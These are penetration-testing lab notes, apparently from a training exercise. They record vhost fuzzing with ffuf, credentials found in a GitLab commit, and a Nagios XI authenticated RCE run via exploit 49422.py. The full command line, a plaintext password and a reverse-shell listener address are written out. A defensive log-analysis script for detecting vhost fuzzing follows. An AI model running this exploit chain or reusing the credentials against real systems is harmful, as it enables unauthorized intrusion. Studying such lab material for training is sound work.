# Initial Enum

- `ping` test
![[images/Pasted image 20260201124751.png]]
- `nmap` scans
![[images/Pasted image 20260201125446.png]]
![[images/Pasted image 20260201131159.png]]
- update `/etc/hosts` to include `gitlab.inlanefreight.local`
![[images/Pasted image 20260201125143.png]]

## Vhost scan

- scan for vhosts with `ffuf`

```bash
# -fs 46166 drops responses of the default vhost's body size so only real vhosts remain
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://inlanefreight.local/ -H 'Host: FUZZ.inlanefreight.local' -fs 46166
```

- found `monitoring`, `gitlab`, and `blog`
![[images/Pasted image 20260201125338.png]]
- add the additional vhosts to `/etc/hosts`
![[images/Pasted image 20260201125709.png]]
- visit each of the above vhosts
- `blog.inlanefreight.local` > WordPress
![[images/Pasted image 20260201125751.png]]
- source code shows indications of WordPress version 5.8
![[images/Pasted image 20260201125904.png]]
- `monitoring.inlanefreight.local` > Nagios XI
![[images/Pasted image 20260201125936.png]]
- `gitlab.inlanefreight.local` > hosted on port 8180
![[images/Pasted image 20260201125558.png]]

# GitLab Enum

- go to `/help` to enumerate the version
![[images/Pasted image 20260201130113.png]]
- go to `/explore` to enumerate projects
![[images/Pasted image 20260201130130.png]]
- try to register a test account
![[images/Pasted image 20260201130732.png]]
- now when we go to `gitlab.inlanefreight.local:8180/explore` we see more projects
![[images/Pasted image 20260201130909.png]]
- drill down into `Nagios Postgresql` in hopes of a password
- there's a commit leaking info
![[images/Pasted image 20260201131122.png]]

# Nagios Enum

- logging into `monitoring.inlanefreight.local` with the found creds dumps us into the below dashboard
![[images/Pasted image 20260201131400.png]]
- looks like a network monitoring tool similar to PRTG
- noted version: 5.7.5
![[images/Pasted image 20260201131424.png]]
- run `searchsploit nagios`
![[images/Pasted image 20260201131539.png]]
- `php/webapps/49422.py` is an authenticated RCE for version 5.7.x
- mirror `49422.py`
![[images/Pasted image 20260201131623.png]]
- view the code > it looks like we pass the target info as arguments
![[images/Pasted image 20260201131708.png]]
- after setting up a listener, run the script as below

```bash
python3 49422.py http://monitoring.inlanefreight.local nagiosadmin "oilaKglm7M09@CPL&^lC" 10.10.14.196 8443
```

- looks like the payload went through
![[images/Pasted image 20260201132103.png]]
- we have a hit on the listener!
![[images/Pasted image 20260201132136.png]]
- now we just need to `cat` the flag
![[images/Pasted image 20260201132301.png]]
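As an added defender-side example (not part of these notes), here is a small Python detector for the vhost fuzzing pattern in the `ffuf` scan above: one client cycling through many `Host` values and mostly receiving the catch-all vhost's response (the 46166-byte body that the `-fs` filter discards). The nginx log format, the thresholds and the sample log lines are assumptions constructed for this example.

```python
import re
from collections import defaultdict

# Assumed (hypothetical) nginx log_format that appends the requested Host:
#   '$remote_addr [$time_local] "$request" $status $body_bytes_sent "$host"'
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) "(?P<host>[^"]*)"$'
)

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"], rec["bytes"] = int(rec["status"]), int(rec["bytes"])
    return rec

def find_vhost_fuzzers(lines, default_size, min_hosts=20, min_ratio=0.8):
    """Return {client_ip: distinct_host_count} for clients that requested at
    least min_hosts distinct Host values and got the catch-all vhost's response
    (body size default_size) for at least min_ratio of their requests.
    A production detector would also bound this to a time window."""
    hosts, catchall, total = defaultdict(set), defaultdict(int), defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip = rec["ip"]
        total[ip] += 1
        hosts[ip].add(rec["host"].lower())
        if rec["bytes"] == default_size:
            catchall[ip] += 1
    return {ip: len(h) for ip, h in hosts.items()
            if len(h) >= min_hosts and catchall[ip] / total[ip] >= min_ratio}

def _line(ip, sec, size, host):
    return (f'{ip} [01/Feb/2026:12:53:{sec:02d} +0000] "GET / HTTP/1.1" '
            f'200 {size} "{host}"')

# Constructed sample log: one client walking a wordlist of Host values (25 misses
# answered by the catch-all vhost, then the 3 real vhosts) and one ordinary user.
SCANNER, USER = "198.51.100.7", "203.0.113.42"
SAMPLE = [_line(SCANNER, i, 46166, f"w{i}.inlanefreight.local") for i in range(25)]
SAMPLE += [_line(SCANNER, 25 + i, s, f"{h}.inlanefreight.local") for i, (h, s)
           in enumerate([("blog", 30215), ("monitoring", 9871), ("gitlab", 2201)])]
SAMPLE += [_line(USER, 30 + i, 30215, "blog.inlanefreight.local") for i in range(5)]

if __name__ == "__main__":
    print(find_vhost_fuzzers(SAMPLE, default_size=46166))  # {'198.51.100.7': 28}
```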